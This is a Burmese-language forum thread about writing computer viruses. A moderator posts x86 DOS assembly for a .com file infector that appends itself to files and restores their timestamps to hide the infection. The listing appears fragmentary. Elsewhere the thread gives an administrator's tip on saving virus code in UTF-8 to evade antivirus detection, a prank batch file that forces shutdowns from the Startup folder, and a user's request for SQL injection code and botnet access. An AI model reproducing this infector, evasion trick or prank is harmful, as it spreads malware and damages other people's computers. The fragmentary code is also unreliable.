    Windows အတွက် virus ကတော့ windows မှာပဲထိရောက်မှာပေါ့…

    ဥပမာ java နဲ့ရေးထားရင် java runtime မပါပဲနဲ့ java က run လို့မရဘူး…
    ဒါဆိုရင်တော့ မရေးသင့်ဘူးပေါ့… java runtime ရှိတဲ့စက်ကိုပဲ ထိမှာလေ…
    .NET နဲ့ ရေးပြန်တော့လည်း .NET Framework ရှိမှ အလုပ်လုပ်မှာ…
    ဒါဆိုလည်း .NET အတွက်က သိပ်မဟုတ်သေးဘူး….
    vb ကတော့ ရတယ်… ဘာ compoment မှ မသုံးပဲရေးရင် runtime မလိုလောက်ဘူး…
    ဒါကြောင့် vb နဲ့ဆိုရင်တော့ ရလောက်တယ်…
    script file တွေကတော့ OK တာပေါ့…
    run time မပါဘူး…
    windows က run ပေးတယ်….
    အဲဒါကြောင့် အများအားဖြင့် .vbs နဲ့အရေးများတယ်…
    နောက်ပြီး C … အဲဒါ အရင်ကတည်းက programming…
    သူ့ exe က စက်တိုင်းလိုလိုအသာလေး run လို့ရတယ်…
    C နဲ့ virus ရေးလို့ရတယ်…
    C က system အထဲထိ ကောင်းကောင်းရေးနိုင်တယ်…
    hardware တွေကိုပါ ဒုက္ခပေးနိုင်တယ်…

    တချို့ virus တွေက hardware တွေကို တိုက်ရိုက်မဟုတ်ပဲ သွယ်၀ိုက်ပြီးပေးတာ…
    ဘယ်လိုလည်းဆိုရင်တော့
    Memory မှာ အပြည့်တင်ထားတယ်.. File တွေကို…
    ဒါဆို user က စက်ကြီးလေးသွားပြီ…
    ဘာမှ မလုပ်နိုင်ဘူး….
    memory ပေါ်မှာလည်း အချိန်ပြည့် wirte မယ်…
    ဒါဆို ကြာရင် memory ကြွသွားမှာပေါ့…

    အဲလိုမျိုး…
    Process မှာ အပြည့်တင်ထားမယ်…
    process တွေကို အသေအကြေ ခိုင်းထားမယ်..
    ဒါဆို ကြာ၇င် Process ကျလာမယ်…
    နောက်ဆုံး ပျက်သွားနိုင်တယ်…

    virus ရှိတဲ့ စက်ထဲကို
    flash disk ကိုထိုးထားလိုက်တယ်..
    နောက်ပြီး…
    ပြန်မဖြုတ်ပဲ…
    ဒီအတိုင်း Computer ကို စက်သုံးနေတယ်..
    အဲဒီ အချိန်မှာ virus က Flash Disk ပေါ်မှာ virus တွေ အချိန်တိုင်း write နေမယ်…
    ကြာရင် flash disk မှာ write တာ များလွန်းတော့ bad sector တွေပေါ်လာမယ်…
    အဲဒါကို မသိပဲ user က ဆက်သုံးတယ်… chkdsk နဲ့ commond prompt မှာ ၀င်မစစ်ဘူး…
    badsector တွေကိုလည်း မပြင်ဘူးဆိုရင် ကြာရင် flash disk ပါကြွသွားနိုင်တယ်…

    virus ပိုင်းဘယ်လိုရေးရလဲဆိုတာ ကို source code နဲ့ ရှေ့မှာ ပြထားဘူးပါတယ်…
    ဘယ်လိုလုပ်ရင် ကောင်းမလဲ…
    ဘယ်လိုတွေ လုပ်နိုင်လဲဆိုတာလေးကို အခုမှ ပြောပြဖြစ်တော့တယ်..

    ကိုယ့်ပျော်ရွှင်မှုကြောင့် သူတစ်ပါး ဒုက္ခမရောက်ပါစေနဲ့လို့ ဆုတောင်းပါတယ်ဗျာ…
  • edited November 2007 Administrators
    ဒီမှာ VB Script source code တွေနဲ့ virus အကြောင်းရေးတယ်ဆိုတာ...
    Computer ဖျက်ဖို့ မဟုတ်ပါဘူး..
    Virus ကိုသိမှ Virus ကိုသတ်နိုင်မှာပါ..
    အဲဒီ ရည်ရွယ်ချက်လေးနဲ့ ရေးလိုက်တာပါ..
    တခြားလူတွေလည်း သိတာတွေ ဝေမျှ...
    မသိတာတွေ ဆွေးနွေးကြရအောင်...
  • edited November 2007 Administrators
    code ကူးမယ်ဆိုရင်
    quote.gif လေးကို နှိပ်ပြီးမှ ပေါ်လာတဲ့ စာကို ကူးစေချင်ပါတယ်...
    ပိုပြီးသေချာအောင်ပါ...
    PHP Code နဲ့ လုပ်ထားတော့
    vbs code တွေကို ဖော်ပြတာ လွဲသွားမှာဆိုးလို့ပါ..
  • edited November 2007 Registered Users
    အရမ်းစိတ်၀င်စားဖို ့ကောင်းပါတယ်ကိုစေတန်..ဆက်ရေးပါအုံး...ကျနော်တို ့တွေစောင် ့ဖတ်နေပါတယ်..။တကယ်က ိုvirus နှင် ့ပါတ်သက်တဲ ့အသိတွေအများကြီးတိုးပွါးပါတယ်...:36:ဒီလိုတန်ဖိုးရှိတဲ ့ပညာရပ်တွေကိုဖြန် ့ေ၀နေတဲ ့..ဒီဖို ့ရမ်ကိုအသိနောက်ကျလေခြင်းလို ့..ကို ့ကိုယ်ကိုမကျေနပ်ဖြစ်မိတာအခါခါပါပဲဗျာ.....။
    ခင်မင်စွာဖြင် ့
    ko-edit:54:
  • edited November 2007 Administrators
    အပေါ်က code တွေကို antivirus တွေက သိပါတယ်..
    ကျွန်တော်တို့တွေ .txt နဲ့တောင် သိမ်းထားလို့မရပါဘုူး..
    အဲဒါက Encoding ကို ANSI နဲ့ သိမ်းလိုက်လို့ပါ...
    ကျွန်တော်တို့တွေ အဲဒီ code တွေကို စက်ထဲမှာ သိမ်းထားချင်ရင်တော့...
    Encoding တွေကို UTF-8 နဲ့ သိမ်းလိုက်ရင်...
    Antivirus တွေက မသိပါတော့ဘူး..

    Notepad မှာ Encoding ဆိုတာ အောက်ခြေနားမှာပါ ပါတယ်..
    UTF-8 နဲ့ သိမ်းလိုက်ရင်တော့ Antivirus တွေ ဘာမှ မတတ်နိုင်တော့ဘူး..
    ဒါပေမယ့် အဲဒီ virus ကလည်း အလုပ်မလုပ်ပါဘူး..
  • edited January 2008 Registered Users
    ကိုစေတန်ရေ
    ဖတ်ရင်းနဲ့ မူးသွားတယ်ဗျာ။ (နယူးရီးယားဆိုတော့ ဘီယာလေးသောက်နေလို့ ... ဟီး)
    ညကလဲ ၁၂ နာရီကျော်မှာ ဟက်ပီးနယူးယား စောင့်ပြီး အော်လိုက်သေးတော့ မူးတူးတူးနဲ့။ အခု ဗိုင်းရပ်စ်ပို့ကို ဖတ်လိုက်တာ ပိုပြီးရေချိန်မှန်သွားတယ်။
    မရေးသေးပါဘူးကွယ်။ မတတ်မှ မတတ်တာ။ ကျနော်နဲ့ဆို ဒါတွေက အေ၀းဆုံးမှာနေမယ်အချစ်ရယ် ဆိုသလိုဘဲ။
    ဒါပါဘဲဗျာ။
    ဇူးလူး
  • edited January 2008 Administrators
    ဇူးလူး ရေး မင်းတော့ မူးသွားတာ ကပို အဆင်ပြေမယ်။ မဟုတ်ရင် မင်းအသစ်ထွင်ထားတဲ့ Virus ကို သတ်ပုံသတ်နည်းတွေရှာနေရဦးမယ်။ တော်ကြာ zulu32.ws ဆိုပြီးပေါ်လာမှဖြင့်။

    ဘီယာပဲမူးနေပါ။

    စည်သူအောင်
  • edited January 2008 Moderators
    မင်္ဂလာပါ။

    ဒီ ကုတ်လေးတွေကတော့ *.com ဖိုင်တွေကို ကပ်တဲ့ ဗိုင်းရပ်စ်ပါ။ :67:

    - အရင် ဖိုင်တွေရှာတယ်၊ ပြီးရင် ဖိုင် ရဲ့ အချိန်တွေကိုမှတ်တယ်။
    - ပြီးရင် ကပ်တယ်။
    - နောက်ဆုံးမှာ ဖိုင်အချိန်ကို ပြန်ရေးတယ်။ ကပ်ထားတာမသိအောင်လို့ပေါ့။

    လေးစားစွာဖြင့်
    မာ့ခ့််

    [html]
    com_files db "*.com",0
    mov ah,4eh
    mov dx,com_files
    mov cx,3
    int 21h
    cmp ax,12h
    je exit
    jmp found_file



    found_file:
    mov di,[si+file]
    push si
    add si,file
    mov ax,offset 4300h
    mov dx,si
    int 21h
    mov file_attrib,cx
    file dw 0

    mov ax,offset 4301h
    mov cx,offset 0fffeh
    mov dx,si
    int 21h
    mov ax,offset 3d02h
    mov dx,si
    int 21h
    jnb ok
    jmp put_old_attrib

    ok:
    mov bx,ax
    mov ax,offset 5700h
    int 21h
    mov old_time,cx
    mov old_date,dx
    old_time db 0
    old_date db 0


    mov ah,3fh
    mov cx,3
    mov dx,first_3
    add dx,si
    int 21h
    cmp ax,3
    jnz fix_file
    first_3 equ $
    int 20h
    nop

    mov ax,offset 4202h
    mov cx,0
    mov dx,0
    int 21h
    mov cx,ax
    sub ax,3
    add cx,offset c_len_y
    mov di,si
    sub di,offset c_len_x
    mov [di],cx

    mov ah,40h
    mov cx,virlength
    mov dx,si
    sub dx,offset codelength
    int 21h
    cmp ax,offset virlength
    jnz fix_file


    mov ax,offset 4200h
    mov cx,0
    mov dx,0
    int 21h

    mov ah,40h
    mov cx,3
    mov dx,si
    add dx,jump
    int 21h
    jump db 0e9h


    fix_file:
    mov dx,old_date
    mov cx,old_time
    and cx,offset 0ffe0h
    mov ax,offset 5701h
    int 21h
    mov ah,3eh
    int 21h

    put_old_attrib:
    mov ax,offset 4301h
    mov cx,old_att
    mov dx,si
    int 21h

    [/html]
  • edited January 2008 Administrators
    ဝါ........................
    ကျေးဇူး
  • edited January 2008 Registered Users
    saturngod wrote: »
    Virus က စမယ်ဆိုကတည်းက 1 file ထဲနဲ့ လုပ်လို့မဖြစ်ပါဘူး…
    အနည်းဆုံး file 2 file မှ ဖြစ်မှာပါ…
    ဘာဖြစ်လို့လည်းဆို…
    file 1 file ကို ပိတ်လိုက်ရင် နောက် file တစ် file က အဲဒါက ပြန်ဖွင့်ပေးမလို့ပါ…

    ကဲ…
    A က တကယ့် virus
    B ကတော့ A ကို အကူအညီပေးဖို့ပေါ့…
    ကိုစေတန်ဂေါ့ဒ်.. အဲဒီဖိုင် ၂ မျိုးလုံးကို အန်တီဗိုင်းရပ်စ် ကသိလားဗျ.. ဒါမှမဟုတ် ဘယ်လို ရှာရမှာလဲ..
  • edited January 2008 Administrators
    k0k0 wrote: »
    ကိုစေတန်ဂေါ့ဒ်.. အဲဒီဖိုင် ၂ မျိုးလုံးကို အန်တီဗိုင်းရပ်စ် ကသိလားဗျ.. ဒါမှမဟုတ် ဘယ်လို ရှာရမှာလဲ..
    Safe mode ကနေဆိုရပါ့ဗျာ..

    အဲ.. ကိုယ်တိုင်ရေးထားတာဆိုရင်တော့ ဘယ် antivirus ကသိမှာမဟုတ်ဘူးနော်.. :D
  • edited January 2008 Registered Users
    ကျေးဇူး ကိုစေတန်ဂေါ့ဒ်.. လောလောဆယ်တော့ ရေးနိုင်တဲ့ အရည်အချင်း မရှိသေးပါဘူး.. ဗဟုသုတ အဖြစ် ကြိုမေးထားတာ.. း)
  • edited January 2008 Registered Users
    နည်းနည်းတော့စမ်းကြည့်လိုက်ဦးမှဘဲး.. ဟီးဟီး.
  • edited January 2008 Administrators
    နည်းနည်းတော့စမ်းကြည့်လိုက်ဦးမှဘဲး.. ဟီးဟီး.
    ရေးပြီးရင် saturngod at gmail.com သို့မဟုတ် saturngod at mysteryzillion.com တစ်ခုခုကို မေးနဲ့ ပိုပေးလိုက်သိလား စေတန် က ဖြန့်ပေးလိမ့်မယ်။

    ဟီဟီ
  • edited February 2008 Registered Users
    ကျေးဇူး ကမ္ဘာပါ ကို စေတန်ဂေါ့ ။ ဒီလိုစိတ်ဓါတ်မျိုးရှိတာသိရလို့လည်း ပိုပြီးလေးစားမိပါတယ်။ ဆက်ပြီး ရေးပါဗျာ
    ကျွန်တော်လည်း ဒီဆိုဒ်ကို လာတာနောက်ကျသွားတယ်။ အစ်ကို့ဘလောက်ဖတ်ရင်းနဲ့မှ သိလို့လာလည်တာ။ ဒီမှာပိုစုံတယ်။ အစက တော့ myanmarfamily.orgကိုဘဲသွားဖြစ်တာ။အဲဒီမှာလည်းကွန်ပျူတာဖိုရမ်ကိုဘဲ၀င်မိတယ်။ တကူးတက ၀င်နေရတာ ။ဒီဆိုဒ်က တော့ ကွန်ပျူတာပိုင်း သတ်သတ်ဆိုတော့ ကျွန်တော့် ဖေးဖရိတ်ဖြစ်သွားပြီဗျာ
  • edited February 2008 Administrators
    myatkoaung wrote: »
    ကျေးဇူး ကမ္ဘာပါ ကို စေတန်ဂေါ့ ။ ဒီလိုစိတ်ဓါတ်မျိုးရှိတာသိရလို့လည်း ပိုပြီးလေးစားမိပါတယ်။ ဆက်ပြီး ရေးပါဗျာ
    ကျွန်တော်လည်း ဒီဆိုဒ်ကို လာတာနောက်ကျသွားတယ်။ အစ်ကို့ဘလောက်ဖတ်ရင်းနဲ့မှ သိလို့လာလည်တာ။ ဒီမှာပိုစုံတယ်။ အစက တော့ myanmarfamily.orgကိုဘဲသွားဖြစ်တာ။အဲဒီမှာလည်းကွန်ပျူတာဖိုရမ်ကိုဘဲ၀င်မိတယ်။ တကူးတက ၀င်နေရတာ ။ဒီဆိုဒ်က တော့ ကွန်ပျူတာပိုင်း သတ်သတ်ဆိုတော့ ကျွန်တော့် ဖေးဖရိတ်ဖြစ်သွားပြီဗျာ
    မမြှောက်နဲဗျ... အခုတောင် ထိုင်ခုံကနေ မြှောက်နေပြီ... :D
    opensource တွေကို သဘောကျတယ်.. knowledge ကတော့ အမြဲ share ၏ တို့မှ မြန်မာတွေ တိုးတက်မယ်လို့ ထင်လို့ပါ.. မြန်မာတွေထဲမှာ ကျွန်တော့်ထက်တော်တဲ့သူတွေရှိပါတယ်.. သူတို့တွေပါ knowledge တွေကို share ရင် အရမ်းကောင်းမယ်ဗျာ..
  • edited February 2008 Registered Users
    ကိုစေတန်ရေ ...
    အချိန်ရရင်တော့ ဆက်ရေးပါအုံးဗျာ ။။:77:
    ကျွန်တော်တို ့စောင့်ဖတ်နေပါတယ် ၊ Virus နဲ ့ပတ်သက်ပြီးလဲ အများကြီးဗဟုသုတရတယ်ဗျ ။။
    ကိုယ်တိုင်စမ်းဘို ့ကတော့ တော်တော် ကြီးကိုကြိုးစားရအုံးမယ်ဗျာ ။။:D
    မသိရင်လဲအားမနာတမ်းမေးမယ်နော် ။။ :67:

    လေးစားစွာဖြင့်
    phoenixO1
  • edited February 2008 Administrators
    phoenixO1 wrote: »
    ကိုစေတန်ရေ ...
    အချိန်ရရင်တော့ ဆက်ရေးပါအုံးဗျာ ။။:77:
    ကျွန်တော်တို ့စောင့်ဖတ်နေပါတယ် ၊ Virus နဲ ့ပတ်သက်ပြီးလဲ အများကြီးဗဟုသုတရတယ်ဗျ ။။
    ကိုယ်တိုင်စမ်းဘို ့ကတော့ တော်တော် ကြီးကိုကြိုးစားရအုံးမယ်ဗျာ ။။:D
    မသိရင်လဲအားမနာတမ်းမေးမယ်နော် ။။ :67:

    လေးစားစွာဖြင့်
    phoenixO1
    ရေးချင်တယ်ဗျ.. ခက်တာက ပညာက ကုန်သွားပြီ... :D
    ရှာဖွေပြီး ကြိုးစားရေးအုံးမယ်ဗျာ..
  • edited February 2008 Registered Users
    သူငယ်ချင်းတွေအချင်းချင်း နောက်နေကျ programလေးပါ .. ဘာ virus မှ မဟုတ်ပါဘူး .... shutdown လုပ်တဲ့ code ကိုဖိုင်ပြန်လုပ်ထားတာပါ ... program ကို run လိုက်တာနဲ့ auto shutdown ဖြစ်သွားတယ် ... အဲဒါလေးကို startup မှာ ထည့်လိုက်ရင်တော့ ပိုကြည့်ကောင်းသွားမှာပေါ့ ... ဟီး .. :D .... ... ပြန်ရှာလိုက်ဦးမယ် ...
  • edited February 2008 Administrators
    I want to say frankly ....
    I think virus seperading is a criminal case and somebody can't control their mind to test their experiments. Becareful please !!!

    But we have to learn how virus work and everybody can learn during short days who has good intution.

    Hope all of us must be hold good mind of an Ethical Programmer or Ethical Hacker.
    Here a link of the "Heaven of Viruses" http://vx.netlux.org/
    Good luck !!!
  • edited April 2008 Registered Users
    :13:
    very nice and clear explanationz...!
    btw, i copied your post and posted it in my website. but, i mentioned that this post was copied from www.mysteryzillion.com and written by saturngod.
    but, if you disappointed, i'll remove this post from my site.
    but, i would like to request you to allow me to show this post in my site.
    that's all
    thanks
    :67:
  • edited April 2008 Registered Users
    ကို စေတန်ရေ ...
    ကျွန်တော်တော့ ကိုစေတန်ရေးတာတွေကြည့်ပြီး မူးသွားပြီ။ ခေါင်းလည်းရှုပ်သွားပြီ။:102:
    အားကျတယ်ဗျာ။ တကယ်ပါ။ :77:
    ကျွန်တော်လိုက်လေ့လာကြည်မယ်။ ပြီးရင်ရေးပြီး ကိုစေတန်ဆီ ပို့လိုက်မယ်နော်။ ဟဲဟဲ... စတာ :3:တကယ်မထင်နဲ့ဦး။ ကျွန်တော်ဘာမှ မတက်ဘူး။
    virus မဟုတ်ဘဲ သူငယ်ချင်းကွန်ပျူတာတွေကို စ(နောက်)တဲ့ coder တစ်ခုကိုတော့ ရေးလိုက်ပြီဗျာ။
    အရင်ဆုံး notepad ကနေ shutdown -r -t 60 လိုု့ရေးပြီးရင် shutdown.bat နဲ့ save လိုက်ရင် ရပြီ။ ကျွန်တော်ပြောတာကို သိတဲ့လူများမှာပါ။ မသိသေးတဲ့ သူငယ်ချင်းတွေ အတွက် တင်ပေးလိုက်တာပါ။60 က second ကိုပြောခြင်းဖြစ်ပါတယ်။ အဲဒီနေရာမှာ မိမိနှစ်သက်ရာ အချိန်ကိုရေးပြီး save လို့ရတယ်။ အဲဒီလိုရေးပြီးရင် ဒီတိုင်း run လည်းရတယ်။ ဒါမှမဟုတ် start menu-> all program-> startup ထဲထည့်လိုက်ရင်တော့ ပိုလန်းသွားပြီ။ B-)
    ပြန်ဖျောက်ချင်ရင်တော့ startup ထဲကနေ ပြန် delete လုပ်လိုက်ပေါ့။
    မှတ်ချက်။ ။ run -> shutdown -r -t -a လို့ရေးပြီးလည်း ပြန် ဖျက်လို့ရပါတယ်။ စမ်းကြည့်ပါလား။:103:
  • xazxaz
    edited April 2008 Registered Users
    yeman wrote: »
    ကို စေတန်ရေ ...
    ကျွန်တော်တော့ ကိုစေတန်ရေးတာတွေကြည့်ပြီး မူးသွားပြီ။ ခေါင်းလည်းရှုပ်သွားပြီ။:102:
    အားကျတယ်ဗျာ။ တကယ်ပါ။ :77:
    ကျွန်တော်လိုက်လေ့လာကြည်မယ်။ ပြီးရင်ရေးပြီး ကိုစေတန်ဆီ ပို့လိုက်မယ်နော်။ ဟဲဟဲ... စတာ :3:တကယ်မထင်နဲ့ဦး။ ကျွန်တော်ဘာမှ မတက်ဘူး။
    virus မဟုတ်ဘဲ သူငယ်ချင်းကွန်ပျူတာတွေကို စ(နောက်)တဲ့ coder တစ်ခုကိုတော့ ရေးလိုက်ပြီဗျာ။
    အရင်ဆုံး notepad ကနေ shutdown -r -t 60 လိုု့ရေးပြီးရင် shutdown.bat နဲ့ save လိုက်ရင် ရပြီ။ ကျွန်တော်ပြောတာကို သိတဲ့လူများမှာပါ။ မသိသေးတဲ့ သူငယ်ချင်းတွေ အတွက် တင်ပေးလိုက်တာပါ။60 က second ကိုပြောခြင်းဖြစ်ပါတယ်။ အဲဒီနေရာမှာ မိမိနှစ်သက်ရာ အချိန်ကိုရေးပြီး save လို့ရတယ်။ အဲဒီလိုရေးပြီးရင် ဒီတိုင်း run လည်းရတယ်။ ဒါမှမဟုတ် start menu-> all program-> startup ထဲထည့်လိုက်ရင်တော့ ပိုလန်းသွားပြီ။ B-)
    ပြန်ဖျောက်ချင်ရင်တော့ startup ထဲကနေ ပြန် delete လုပ်လိုက်ပေါ့။
    မှတ်ချက်။ ။ run -> shutdown -r -t -a လို့ရေးပြီးလည်း ပြန် ဖျက်လို့ရပါတယ်။ စမ်းကြည့်ပါလား။:103:
    ပြန်ဖြည် ဖို့က shutdown -a ဆိုရပါပြီ သူ့ကိုလဲ recover လုပ်ဖို့ .bat နဲ့သိမ်းလိုက်ပေါ့
    shutdown.bat ကိုတော့ ၆၀ နေရာမှာ ၀ ပဲပေးလိုက်ပြီးရော။-s က shutdown ပါ -r က restart ပါ -t ကတော့ အချိန်ပေါ့
    cmd ထဲမှာ shutdown -t လို့ရိုက်လိုက်ပါ ရှင်းသွားပါလိမ်မယ်။
  • edited April 2008 Registered Users
    ကျေးဇူးပါ ကိုစေတန်။ ခုမှ ဖတ်ဖြစ်လို့ တော်တော် ဗဟုသုတရပါတယ်။
    Virus Code တွေ အပြင် SQL Injection လုပ်တဲ့နည်းလေး၊ Code လေးရှိရင်မျှပါလား။
    ပြီးတော့ BotNet တစ်ခုခုကို ဘယ်လို Join လို့ရမလဲသိနိုင်မလားခင်ဗျာ။
  • edited April 2008 Registered Users
    xaz wrote: »
    ပြန်ဖြည် ဖို့က shutdown -a ဆိုရပါပြီ သူ့ကိုလဲ recover လုပ်ဖို့ .bat နဲ့သိမ်းလိုက်ပေါ့
    shutdown.bat ကိုတော့ ၆၀ နေရာမှာ ၀ ပဲပေးလိုက်ပြီးရော။-s က shutdown ပါ -r က restart ပါ -t ကတော့ အချိန်ပေါ့
    cmd ထဲမှာ shutdown -t လို့ရိုက်လိုက်ပါ ရှင်းသွားပါလိမ်မယ်။
    ဟဲဟဲ.. မှားသွားလို့:D ကျွန်တော်မလုပ်တာကြာတော့မှားသွားတာ။ ကျေးဇူးကိုxaz ရေ။:77:
  • edited September 2008 Registered Users
    ကျွန်တော်အခု Fedora 9 ဆိုတဲ့ OS လေးကို ဆိုင်က၀ယ်ပြီး၊ ကိုယ့်စက်ပေါ် တင် run ထားတယ်ဗျ...ခက်တာက Fedora 9 ကို ဘာမှန်းမသိသေးဘူး..နောက်ပြီး ၀ယ်တုန်းကတော့ Linux နာမည်ကြီးနေလို့ စမ်းကြည့်ရအောင်ဆိုပြီး ၀ယ်ခဲ့တာ.....အသုံးပြုတော့ ကြုံရတဲ့ ပြသနာက စက် Hang တာပါဘဲ..အဲဒါနဲ့ ကျွန်တော်လဲ သတိရပြီး ဒီ ဖိုရမ်လေးမှာ ၀င်ပြီးPost တင်လိုက်ရင် နောက် Linux လေ့လာသူတွေပါ အဆင်ပြေမယ်ထင်ပြီး ရေးလိုက်ပါတယ်ဗျာ..အဲ မှားလို့ စပြီးမေးဖို့ လုပ်လိုက်ပါတယ်..၀င်ရောက်ဆွေးနွေးပေးမယ့် ဆရာတွေရော..မိတ်ဆွေတွေရော...စောင့်မျှော်နေတယ်နော်..မေးဖို့ကတော့ အဆင်သင့်ပါပဲဗျာ....Red hat Enterprise Linux 5 နဲ့ Federo 9 နှစ်ခု ၀ယ်ပြီး စမ်းတင်လိုက်တာ..Hard disk တစ်လုံးကတော့ Unknow device ဖြစ်သွားပြီဗျ......Red Hat ကတော့ တက်မလာဘူး..Fedora 9 ကတော့ တက်လာတယ်..ဒါပေမယ့် အရမ်းကြာပြီး ခဏခဏ Hang တယ်ဗျာ..အဲဒီပြဿနာကို ရှင်းလို့ရမလား သိရင် ပြောကြပါလား..နောက်တစ်ခု အရေးအကြီးဆုံးက အဲဒီ Fedora 9 မှာ အင်တာနက်ချိတ်လို့မရသေးဘူးဗျ...Dial up ချိတ်တဲ့နည်းလေးပါ..သိရင် ပြောအုံးနော်.....ဟဲ..ဟဲ..ကျွန်တော် မေးတာ အစပဲ ရှိသေးတယ်ဗျိုု့......ပြီးရင်တော့် အဲဒီ့ Linux နဲ့ Hacking ဘက် သွားဖို့ ရည်ရွယ်ထားပါတယ်ဗျို့.....
  • edited September 2008 Registered Users
    စက်မဟန်းချင်ရင်
    CLI နဲ့ သုံးပေါ့ကွယ်..

    GUI ဆိုတာက memory အတော်စားတဲ့ သတ္တ၀ါပဲ :D
  • edited September 2008 Registered Users
    ဒါနဲ့
    စကားမစပ်
    Virus ရေးမယ်ဆိုတဲ့ထဲမှာ ဘာလို့ ဒါတွေ ပြောနေကြပါလိမ့်..
    Topic လွှဲနေကြပြီထင်တယ်.. :2:
  • edited September 2008 Administrators
    မသိ... အဲဒီအပိုင်းလေ့လာချင်သေးတယ်ဗျာ... SQL injection ကိုပေါ့... တီလေး သိလိမ့်မယ်... တီလေးကို မေးကြည့်ပါလား... သူက အဲဒါတွေ ဂျွတ်တယ်ဗျ... တီလေးဆိုတာ TweetyCoaster ကိုပြောတာနော်..
  • edited September 2008 Registered Users
    ကိုစေတန် ထပ်ရေးပါဦးဗျ တော်တော် ဗဟုသုတ ရတယ်။
    အခုလိုအပင်ပန်းခံရေးပေးတဲ့အတွက် ကျေးဇူးလည်းတင်တယ်ဗျာ။
  • edited September 2008 Administrators
    Thanks a lots and congratulation bro.

    How genius you are. I really envy you. :)

    May you have more progress on your life.

    Thanks and Regards,

    Alexannder
    UNICEF ( Maw Gyun ) :103:
Sign In or Register to comment.